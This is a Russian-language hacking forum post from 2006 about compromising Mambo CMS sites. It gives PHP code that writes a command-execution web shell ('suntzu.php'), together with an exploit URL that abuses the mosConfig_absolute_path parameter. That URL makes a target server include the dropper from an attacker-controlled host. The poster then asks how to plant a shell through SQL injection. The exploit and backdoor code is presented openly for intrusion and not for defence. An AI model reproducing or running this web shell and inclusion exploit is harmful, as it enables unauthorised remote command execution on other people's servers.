07.01.2006, 18:15
|
|
Познающий
Регистрация: 13.10.2005
Сообщений: 41
Провел на форуме:
62530
Репутация:
1
|
|
Так еще раз, файл с содержимым
PHP код:
<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0);
system($HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>
заливается на левый сервак(на специальный адресс),а вот с помощью команды
PHP код:
http://[target]//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=левый_сервак
код выполняется на серваке.
Вообщем хер сним,ибо у этотого экса значительные ограничения.
Еще раз,на мамбе последних версиях есть возможность проведения sql-i инъекций.Так вот как с их помощью чертов шелл зафигачить на сервер? |
|
|